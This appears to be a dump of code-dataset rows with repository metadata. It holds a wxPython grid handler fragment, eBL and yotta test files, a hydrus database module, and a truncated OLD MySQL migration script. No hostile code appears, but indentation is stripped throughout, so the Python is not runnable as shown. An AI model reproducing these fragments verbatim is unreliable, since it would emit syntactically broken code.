py = self.lwin.ClientToScreenXY(0,self.startY)[1]
py = self.grid.ScreenToClientXY(0,py)[1]
sy = self.grid.GetViewStart()[1] * self.uy
sy -= self.grid.GetColLabelSize()
row = self.grid.YToRow(py + sy)
if row != wx.NOT_FOUND:
self.grid.SelectRow(row,evt.m_controlDown)
return
else:
bRow = self.rowWin.GetInsertionRow()
dRow = self.rowWin.GetMoveRow()
wx.PostEvent(self,
GridRowMoveEvent(self.grid.GetId(), dRow, bRow))
self.rowWin.Destroy()
evt.Skip()
def _CaptureImage(self,rect):
bmp = wx.EmptyBitmap(rect.width,rect.height)
memdc = wx.MemoryDC()
memdc.SelectObject(bmp)
dc = wx.WindowDC(self.lwin)
memdc.Blit(0,0, rect.width, rect.height, dc, rect.x, rect.y)
memdc.SelectObject(wx.NullBitmap)
return bmp
#----------------------------------------------------------------------------
| [
"RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775"
] | RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775 |
c52e5a01d006afaa44d941558a3b4413e7d46507 | 2c97e11e13bfbabfdae8979385ba0957c7b11270 | /ebl/tests/corpus/test_text.py | 492a85c0eae4e191f7fa44e750326ebdfcf9d5eb | [
"MIT"
] | permissive | ElectronicBabylonianLiterature/ebl-api | 72a2a95291e502ec89a20ebe5c14447e63ac6d92 | 4910f6fbb57fa213fef55cbe9bc16215aebbaa27 | refs/heads/master | 2023-08-16T12:42:03.303042 | 2023-08-16T10:59:44 | 2023-08-16T10:59:44 | 135,266,736 | 11 | 3 | MIT | 2023-09-12T09:56:14 | 2018-05-29T08:39:58 | Python | UTF-8 | Python | false | false | 679 | py | import pytest
from ebl.transliteration.domain.stage import Stage
from ebl.tests.factories.corpus import ChapterListingFactory, TextFactory
@pytest.mark.parametrize(
"chapters,expected",
[
(tuple(), False),
(ChapterListingFactory.build_batch(2, stage=Stage.NEO_ASSYRIAN), False),
(
[
ChapterListingFactory.build(stage=Stage.NEO_ASSYRIAN),
ChapterListingFactory.build(stage=Stage.OLD_ASSYRIAN),
],
True,
),
],
)
def test_has_multiple_stages(chapters, expected) -> None:
text = TextFactory.build(chapters=chapters)
assert text.has_multiple_stages == expected
| [
"[email protected]"
] | |
917fcebd166d847a92f7e606dacab4fd29e3999f | 3f70e754981a941dbc3a24d15edb0a5abe3d4788 | /yotta/test/test_ignores.py | a2b9a8a7100fa9cee34d536a142b11b4dc2cd2c5 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ARMmbed/yotta | 66cfa634f03a25594311a569ea369a916cff70bf | 82d854b43d391abb5a006b05e7beffe7d0d6ffbf | refs/heads/master | 2023-03-16T11:57:12.852163 | 2021-01-15T13:49:47 | 2021-01-15T13:49:47 | 16,579,440 | 184 | 87 | Apache-2.0 | 2021-01-15T13:46:43 | 2014-02-06T13:03:45 | Python | UTF-8 | Python | false | false | 5,789 | py | #!/usr/bin/env python
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import unittest
import os
# internal modules:
from yotta.lib.detect import systemDefaultTarget
from yotta.lib import component
from yotta.test.cli import cli
from yotta.test.cli import util
Test_Files = {
'.yotta_ignore': '''
#comment
/moo
b/c/d
b/c/*.txt
/a/b/test.txt
b/*.c
/source/a/b/test.txt
/test/foo
sometest/a
someothertest
ignoredbyfname.c
''',
'module.json': '''
{
"name": "test-testdep-f",
"version": "0.0.6",
"description": "Module to test test-dependencies and ignoring things",
"author": "autopulated",
"licenses": [
{
"url": "https://spdx.org/licenses/Apache-2.0",
"type": "Apache-2.0"
}
],
"dependencies": {},
"testDependencies": {}
}
''',
'a/b/c/d/e/f/test.txt': '',
'a/b/c/d/e/test.c': '#error should be ignored',
'a/b/c/d/e/test.txt': '',
'a/b/c/d/test.c': '#error should be ignored',
'a/b/c/d/test.txt': '',
'a/b/c/d/z/test.c':'#error should be ignored',
'a/b/c/test.txt': '',
'a/b/test.txt':'',
'a/test.txt':'',
'comment':'# should not be ignored',
'f/f.h':'''
#ifndef __F_H__
#define __F_H__
int f();
#endif
''',
'source/moo/test.txt':'',
'source/a/b/c/d/e/f/test.txt': '',
'source/a/b/c/d/e/test.c': '#error should be ignored',
'source/a/b/c/d/e/test.txt': '',
'source/a/b/c/d/test.c': '#error should be ignored',
'source/a/b/c/d/test.txt': '',
'source/a/b/c/d/z/test.c':'#error should be ignored',
'source/a/b/c/test.txt': '',
'source/a/b/test.txt':'',
'source/a/test.txt':'',
'source/f.c':'''
int f(){
return 6;
}
''',
'test/anothertest/ignoredbyfname.c':'#error should be ignored',
'test/anothertest/ignoredbyfname.c':'''
#include <stdio.h>
#include "f/f.h"
int main(){
int result = f();
printf("%d\n", result);
return !(result == 6);
}
''',
'test/foo/ignored.c':'''
#error should be ignored
''',
'test/someothertest/alsoignored.c':'''
#error should be ignored
''',
'test/sometest/a/ignored.c':'''
#error should be ignored
'''
}
Default_Test_Files = {
'module.json': '''
{
"name": "test-testdep-f",
"version": "0.0.6",
"license": "Apache-2.0"
}'''
}
def isWindows():
    # native build/test steps can't run on windows yet (cf. the skipIf reasons below)
return os.name == 'nt'
class TestPackIgnores(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.test_dir = util.writeTestFiles(Test_Files)
@classmethod
def tearDownClass(cls):
util.rmRf(cls.test_dir)
def test_absolute_ignores(self):
c = component.Component(self.test_dir)
self.assertTrue(c.ignores('moo'))
self.assertTrue(c.ignores('test/foo/ignored.c'))
def test_glob_ignores(self):
c = component.Component(self.test_dir)
self.assertTrue(c.ignores('a/b/c/test.txt'))
self.assertTrue(c.ignores('a/b/test.txt'))
self.assertTrue(c.ignores('a/b/test.c'))
self.assertTrue(c.ignores('source/a/b/c/test.txt'))
self.assertTrue(c.ignores('source/a/b/test.txt'))
self.assertTrue(c.ignores('source/a/b/test.c'))
def test_relative_ignores(self):
c = component.Component(self.test_dir)
self.assertTrue(c.ignores('a/b/c/d/e/f/test.txt'))
self.assertTrue(c.ignores('a/b/test.txt'))
self.assertTrue(c.ignores('source/a/b/c/d/e/f/test.txt'))
self.assertTrue(c.ignores('source/a/b/test.txt'))
self.assertTrue(c.ignores('test/anothertest/ignoredbyfname.c'))
self.assertTrue(c.ignores('test/someothertest/alsoignored.c'))
def test_default_ignores(self):
default_test_dir = util.writeTestFiles(Default_Test_Files)
c = component.Component(default_test_dir)
self.assertTrue(c.ignores('.something.c.swp'))
self.assertTrue(c.ignores('.something.c~'))
self.assertTrue(c.ignores('path/to/.something.c.swm'))
self.assertTrue(c.ignores('path/to/.something.c~'))
self.assertTrue(c.ignores('.DS_Store'))
self.assertTrue(c.ignores('.git'))
self.assertTrue(c.ignores('.hg'))
self.assertTrue(c.ignores('.svn'))
self.assertTrue(c.ignores('yotta_modules'))
self.assertTrue(c.ignores('yotta_targets'))
self.assertTrue(c.ignores('build'))
self.assertTrue(c.ignores('.yotta.json'))
util.rmRf(default_test_dir)
def test_comments(self):
c = component.Component(self.test_dir)
self.assertFalse(c.ignores('comment'))
@unittest.skipIf(isWindows(), "can't build natively on windows yet")
def test_build(self):
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'clean'], self.test_dir)
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'build'], self.test_dir)
self.assertNotIn('ignoredbyfname', stdout)
self.assertNotIn('someothertest', stdout)
self.assertNotIn('sometest', stdout)
@unittest.skipIf(isWindows(), "can't build natively on windows yet")
def test_test(self):
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'clean'], self.test_dir)
stdout = self.runCheckCommand(['--target', systemDefaultTarget(), 'test'], self.test_dir)
self.assertNotIn('ignoredbyfname', stdout)
self.assertNotIn('someothertest', stdout)
self.assertNotIn('sometest', stdout)
def runCheckCommand(self, args, test_dir):
stdout, stderr, statuscode = cli.run(args, cwd=self.test_dir)
if statuscode != 0:
print('command failed with status %s' % statuscode)
print(stdout)
print(stderr)
self.assertEqual(statuscode, 0)
return stdout or stderr
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
21592df1ab03e4bc5631a96f3de6b93a787069ac | e6f0d9716288c7a8ac04aad852343177195fe8a4 | /hydrus/client/db/ClientDBMappingsStorage.py | b563cc014146c8b9f8777769f993c37b28e09b00 | [
"WTFPL"
] | permissive | dot1991/hydrus | d5fb7960650c7b0cc999832be196deec073146a2 | e95ddf7fb65e2a1fc82e091473c4c9e6cb09e69d | refs/heads/master | 2023-06-15T19:29:59.477574 | 2021-07-14T20:42:19 | 2021-07-14T20:42:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,221 | py | import sqlite3
import typing
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusDBModule
from hydrus.client.db import ClientDBServices
def GenerateMappingsTableNames( service_id: int ) -> typing.Tuple[ str, str, str, str ]:
suffix = str( service_id )
current_mappings_table_name = 'external_mappings.current_mappings_{}'.format( suffix )
deleted_mappings_table_name = 'external_mappings.deleted_mappings_{}'.format( suffix )
pending_mappings_table_name = 'external_mappings.pending_mappings_{}'.format( suffix )
petitioned_mappings_table_name = 'external_mappings.petitioned_mappings_{}'.format( suffix )
return ( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name )
class ClientDBMappingsStorage( HydrusDBModule.HydrusDBModule ):
def __init__( self, cursor: sqlite3.Cursor, modules_services: ClientDBServices.ClientDBMasterServices ):
self.modules_services = modules_services
HydrusDBModule.HydrusDBModule.__init__( self, 'client mappings storage', cursor )
def _GetInitialIndexGenerationTuples( self ):
index_generation_tuples = []
return index_generation_tuples
def CreateInitialTables( self ):
pass
def GetExpectedTableNames( self ) -> typing.Collection[ str ]:
expected_table_names = []
return expected_table_names
def DropMappingsTables( self, service_id: int ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( current_mappings_table_name ) )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( deleted_mappings_table_name ) )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( pending_mappings_table_name ) )
self._c.execute( 'DROP TABLE IF EXISTS {};'.format( petitioned_mappings_table_name ) )
def GenerateMappingsTables( self, service_id: int ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( current_mappings_table_name ) )
self._CreateIndex( current_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( deleted_mappings_table_name ) )
self._CreateIndex( deleted_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( pending_mappings_table_name ) )
self._CreateIndex( pending_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
self._c.execute( 'CREATE TABLE IF NOT EXISTS {} ( tag_id INTEGER, hash_id INTEGER, reason_id INTEGER, PRIMARY KEY ( tag_id, hash_id ) ) WITHOUT ROWID;'.format( petitioned_mappings_table_name ) )
self._CreateIndex( petitioned_mappings_table_name, [ 'hash_id', 'tag_id' ], unique = True )
def GetCurrentFilesCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( DISTINCT hash_id ) FROM {};'.format( current_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetDeletedMappingsCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( * ) FROM {};'.format( deleted_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetPendingMappingsCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( * ) FROM {};'.format( pending_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetPetitionedMappingsCount( self, service_id: int ) -> int:
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
result = self._c.execute( 'SELECT COUNT( * ) FROM {};'.format( petitioned_mappings_table_name ) ).fetchone()
( count, ) = result
return count
def GetTablesAndColumnsThatUseDefinitions( self, content_type: int ) -> typing.List[ typing.Tuple[ str, str ] ]:
        if content_type == HC.CONTENT_TYPE_HASH:
tables_and_columns = []
for service_id in self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
tables_and_columns.extend( [
( current_mappings_table_name, 'hash_id' ),
( deleted_mappings_table_name, 'hash_id' ),
( pending_mappings_table_name, 'hash_id' ),
( petitioned_mappings_table_name, 'hash_id' )
] )
return tables_and_columns
        elif content_type == HC.CONTENT_TYPE_TAG:
tables_and_columns = []
for service_id in self.modules_services.GetServiceIds( HC.REAL_TAG_SERVICES ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = GenerateMappingsTableNames( service_id )
tables_and_columns.extend( [
( current_mappings_table_name, 'tag_id' ),
( deleted_mappings_table_name, 'tag_id' ),
( pending_mappings_table_name, 'tag_id' ),
( petitioned_mappings_table_name, 'tag_id' )
] )
return tables_and_columns
return []
| [
"[email protected]"
] | |
ffdee593dfdcf10d8efd3c6153844ea9bd405272 | e5a9f032c160b841fd9cbac9675c06dd2cf4dbe0 | /onlinelinguisticdatabase/model/db_update_scripts/0.2.7_1.0a2/old_update_db_0.2.7_1.0a1.py | 05ac0ab17bcef143916bb8bf823019897ce1b213 | [
"Apache-2.0"
] | permissive | FieldDB/old | bfaa94690dc10f8081ad586663f09b550c2b50aa | f9cdbfe48eb9709f0b2d1e7790e7c2e612937071 | refs/heads/master | 2021-01-21T04:00:01.450384 | 2013-08-13T18:14:32 | 2013-08-13T18:14:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78,347 | py | #!/usr/bin/python
# Copyright 2013 Joel Dunham
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This executable updates an OLD 0.2.7 MySQL database and makes it compatible with
the OLD 1.0a2 data structure
Usage:
    $ ./old_update_db_0.2.7_1.0a1.py -d mysql_db_name -u mysql_username -p mysql_password [-f mysql_dump_file_path] [--default-morphemes]
The script will print out a list of warnings or reminders to hand-edit some of the data, as necessary.
The username and password supplied must have full db access, i.e., permission to create, drop and alter
databases, tables, etc.
If the optional ``mysql_dump_file_path`` parameter is not supplied,
ensure that your MySQL server contains an OLD 0.2.7 database called
``mysql_db_name``. If the dump file path paramter is supplied, this script
will drop any database called ``mysql_db_name``, recreate it and populate it
with the data from the dump file.
Please ensure that your MySQL installation is set up to use UTF-8 throughout. This will probably mean
making changes to your MySQL configuration file (/etc/mysql/my.cnf in Debian systems), cf.
http://cameronyule.com/2008/07/configuring-mysql-to-use-utf-8/.
This script will change any non-UTF-8 databases, tables and columns to UTF-8 following the procedure
outlined at https://codex.wordpress.org/Converting_Database_Character_Sets. It will also perform
unicode canonical decompositional normalization on all the data.
Notes on character sets
Get info on the system generally:
$ show variables like "collation%";
$ show variables like "character_set%";
Get info on the databases:
$ select schema_name, default_character_set_name, default_collation_name from information_schema.schemata;
Get info on the tables:
$ select table_name, table_collation from information_schema.tables where table_schema="...";
Get info on the columns:
$ select column_name, collation_name from information_schema.columns where table_schema="..." and table_name="...";
    $ select table_name, column_name, collation_name from information_schema.columns where table_schema='old_test' order by table_name, column_name;
"""
import os
import sys
import re
import string
import subprocess
import datetime
import unicodedata
from random import choice, shuffle
from uuid import uuid4
from sqlalchemy import create_engine, MetaData, Table, bindparam
from docutils.core import publish_parts
from passlib.hash import pbkdf2_sha512
try:
import json
except ImportError:
import simplejson as json
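# Illustrative sketch only (this helper is not called anywhere in this script):
# the module docstring above recommends confirming that the MySQL server itself
# is configured for UTF-8 before running the update.  The function name and the
# localhost:3306 connection details below are assumptions made for the example;
# adjust them to match your own setup.
def print_server_charset_info(mysql_username, mysql_password):
    """Print the server-level character set and collation settings."""
    engine = create_engine('mysql://%s:%s@localhost:3306/information_schema' % (
        mysql_username, mysql_password))
    row = engine.execute(
        'SELECT @@character_set_server, @@character_set_client, @@collation_server;').fetchone()
    print 'character_set_server: %s' % row[0]
    print 'character_set_client: %s' % row[1]
    print 'collation_server: %s' % row[2]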
# update_SQL holds the SQL statements that create the 1.0 tables missing in 0.2.7 and
# alter the existing tables.
update_SQL = '''
-- Create the applicationsettingsuser table
CREATE TABLE `applicationsettingsuser` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`applicationsettings_id` int(11) DEFAULT NULL,
`user_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `applicationsettings_id` (`applicationsettings_id`),
KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- Create the orthography table
CREATE TABLE `orthography` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) DEFAULT NULL,
`orthography` text,
`lowercase` tinyint(1) DEFAULT NULL,
`initial_glottal_stops` tinyint(1) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- Modify the application_settings table as needed
RENAME TABLE application_settings TO applicationsettings;
-- Normalize the non-'yes' values first so that rows set to 1 below are not clobbered
UPDATE applicationsettings
    SET morphemeBreakIsObjectLanguageString=0
    WHERE morphemeBreakIsObjectLanguageString!='yes';
UPDATE applicationsettings
    SET morphemeBreakIsObjectLanguageString=1
    WHERE morphemeBreakIsObjectLanguageString='yes';
ALTER TABLE applicationsettings
-- The following CONVERT clause may change TEXTs to MEDIUMTEXTS, cf. http://bugs.mysql.com/bug.php?id=31291
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE objectLanguageId object_language_id VARCHAR(3) DEFAULT NULL,
CHANGE objectLanguageName object_language_name VARCHAR(255) DEFAULT NULL,
CHANGE metaLanguageId metalanguage_id VARCHAR(3) DEFAULT NULL,
CHANGE metaLanguageName metalanguage_name VARCHAR(255) DEFAULT NULL,
CHANGE metaLanguageOrthography metalanguage_inventory TEXT,
CHANGE orthographicValidation orthographic_validation VARCHAR(7) DEFAULT NULL,
CHANGE punctuation punctuation TEXT,
CHANGE narrPhonInventory narrow_phonetic_inventory TEXT,
CHANGE narrPhonValidation narrow_phonetic_validation VARCHAR(7) DEFAULT NULL,
CHANGE broadPhonInventory broad_phonetic_inventory TEXT,
CHANGE broadPhonValidation broad_phonetic_validation VARCHAR(7) DEFAULT NULL,
CHANGE morphemeBreakIsObjectLanguageString morpheme_break_is_orthographic tinyint(1) DEFAULT NULL,
CHANGE morphPhonValidation morpheme_break_validation VARCHAR(7) DEFAULT NULL,
CHANGE morphPhonInventory phonemic_inventory TEXT,
CHANGE morphDelimiters morpheme_delimiters VARCHAR(255) DEFAULT NULL,
DROP COLUMN headerImageName,
DROP COLUMN colorsCSS,
ADD storage_orthography_id int(11) DEFAULT NULL,
ADD input_orthography_id int(11) DEFAULT NULL,
ADD output_orthography_id int(11) DEFAULT NULL,
ADD KEY (storage_orthography_id),
ADD KEY (input_orthography_id),
ADD KEY (output_orthography_id);
-- Change the collection table
ALTER TABLE collection
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
MODIFY contents TEXT,
MODIFY description TEXT,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
ADD COLUMN html TEXT,
ADD COLUMN modifier_id INT(11) DEFAULT NULL,
ADD COLUMN contents_unpacked TEXT,
ADD KEY (modifier_id);
UPDATE collection SET markup_language = 'restructuredText';
-- Change the collectionbackup TABLE
ALTER TABLE collectionbackup
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
ADD COLUMN markup_language VARCHAR(100) DEFAULT NULL,
ADD COLUMN html TEXT,
ADD COLUMN modifier TEXT,
MODIFY speaker TEXT,
MODIFY elicitor TEXT,
MODIFY enterer TEXT,
MODIFY description TEXT,
MODIFY contents TEXT,
MODIFY source TEXT,
MODIFY files TEXT,
ADD COLUMN forms TEXT,
ADD COLUMN tags TEXT;
UPDATE collectionbackup SET markup_language = 'restructuredText';
ALTER TABLE collectionfile
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
ALTER TABLE collectionform
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
CREATE TABLE `collectiontag` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`collection_id` int(11) DEFAULT NULL,
`tag_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `collection_id` (`collection_id`),
KEY `tag_id` (`tag_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpus` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`description` text,
`content` longtext,
`enterer_id` int(11) DEFAULT NULL,
`modifier_id` int(11) DEFAULT NULL,
`form_search_id` int(11) DEFAULT NULL,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `enterer_id` (`enterer_id`),
KEY `modifier_id` (`modifier_id`),
KEY `form_search_id` (`form_search_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpusbackup` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`UUID` varchar(36) DEFAULT NULL,
`name` varchar(255) DEFAULT NULL,
`type` varchar(255) DEFAULT NULL,
`description` text,
`content` longtext,
`enterer` text,
`modifier` text,
`form_search` text,
`datetime_entered` datetime DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`tags` text,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpusfile` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`filename` varchar(255) DEFAULT NULL,
`format` varchar(255) DEFAULT NULL,
`creator_id` int(11) DEFAULT NULL,
`modifier_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
`datetime_created` datetime DEFAULT NULL,
`restricted` tinyint(1) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `corpus_id` (`corpus_id`),
KEY `creator_id` (`creator_id`),
KEY `modifier_id` (`modifier_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpusform` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`form_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `corpus_id` (`corpus_id`),
KEY `form_id` (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
CREATE TABLE `corpustag` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`corpus_id` int(11) DEFAULT NULL,
`tag_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `corpus_id` (`corpus_id`),
KEY `tag_id` (`tag_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE elicitationmethod
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
MODIFY description TEXT;
ALTER TABLE file
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
CHANGE MIMEtype MIME_type VARCHAR(255) DEFAULT NULL,
CHANGE utteranceType utterance_type VARCHAR(255) DEFAULT NULL,
ADD COLUMN filename VARCHAR(255) DEFAULT NULL,
ADD COLUMN lossy_filename VARCHAR(255) DEFAULT NULL,
MODIFY description TEXT,
CHANGE embeddedFileMarkup url VARCHAR(255) DEFAULT NULL,
CHANGE embeddedFilePassword password VARCHAR(255) DEFAULT NULL,
ADD COLUMN parent_file_id INT(11) DEFAULT NULL,
ADD COLUMN start FLOAT DEFAULT NULL,
ADD COLUMN end FLOAT DEFAULT NULL,
ADD KEY (parent_file_id),
ADD UNIQUE (filename),
DROP INDEX name;
CREATE TABLE `filetag` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`file_id` int(11) DEFAULT NULL,
`tag_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `file_id` (`file_id`),
KEY `tag_id` (`tag_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
ALTER TABLE form
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
CHANGE phoneticTranscription phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE narrowPhoneticTranscription narrow_phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE morphemeBreak morpheme_break VARCHAR(255) DEFAULT NULL,
CHANGE morphemeGloss morpheme_gloss VARCHAR(255) DEFAULT NULL,
CHANGE syntacticCategoryString syntactic_category_string VARCHAR(255) DEFAULT NULL,
CHANGE breakGlossCategory break_gloss_category VARCHAR(1023) DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
MODIFY comments TEXT,
CHANGE speakerComments speaker_comments TEXT,
CHANGE morphemeBreakIDs morpheme_break_ids TEXT,
CHANGE morphemeGlossIDs morpheme_gloss_ids TEXT,
ADD COLUMN syntax VARCHAR(1023) DEFAULT NULL,
ADD COLUMN semantics VARCHAR(1023) DEFAULT NULL,
ADD COLUMN status VARCHAR(40) DEFAULT NULL,
ADD COLUMN modifier_id INT(11) DEFAULT NULL,
ADD KEY (modifier_id);
UPDATE form SET status='tested';
ALTER TABLE formbackup
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL,
CHANGE datetimeEntered datetime_entered datetime DEFAULT NULL,
CHANGE dateElicited date_elicited date DEFAULT NULL,
CHANGE phoneticTranscription phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE narrowPhoneticTranscription narrow_phonetic_transcription VARCHAR(255) DEFAULT NULL,
CHANGE morphemeBreak morpheme_break VARCHAR(255) DEFAULT NULL,
CHANGE morphemeGloss morpheme_gloss VARCHAR(255) DEFAULT NULL,
CHANGE syntacticCategoryString syntactic_category_string VARCHAR(255) DEFAULT NULL,
CHANGE breakGlossCategory break_gloss_category VARCHAR(1023) DEFAULT NULL,
ADD COLUMN UUID VARCHAR(36) DEFAULT NULL,
MODIFY comments TEXT,
CHANGE speakerComments speaker_comments TEXT,
CHANGE morphemeBreakIDs morpheme_break_ids TEXT,
CHANGE morphemeGlossIDs morpheme_gloss_ids TEXT,
MODIFY elicitor TEXT,
MODIFY enterer TEXT,
MODIFY verifier TEXT,
MODIFY speaker TEXT,
CHANGE elicitationMethod elicitation_method TEXT,
CHANGE syntacticCategory syntactic_category TEXT,
MODIFY source TEXT,
MODIFY files TEXT,
CHANGE keywords tags TEXT,
CHANGE glosses translations TEXT,
ADD COLUMN syntax VARCHAR(1023) DEFAULT NULL,
ADD COLUMN semantics VARCHAR(1023) DEFAULT NULL,
ADD COLUMN modifier TEXT;
ALTER TABLE formfile
CONVERT TO CHARACTER SET utf8,
CHANGE datetimeModified datetime_modified datetime DEFAULT NULL;
CREATE TABLE `formsearch` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) DEFAULT NULL,
`search` text,
`description` text,
`enterer_id` int(11) DEFAULT NULL,
`datetime_modified` datetime DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `enterer_id` (`enterer_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
RENAME TABLE formkeyword TO formtag;
ALTER TABLE formtag
CONVERT TO CHARACTER SET utf8,
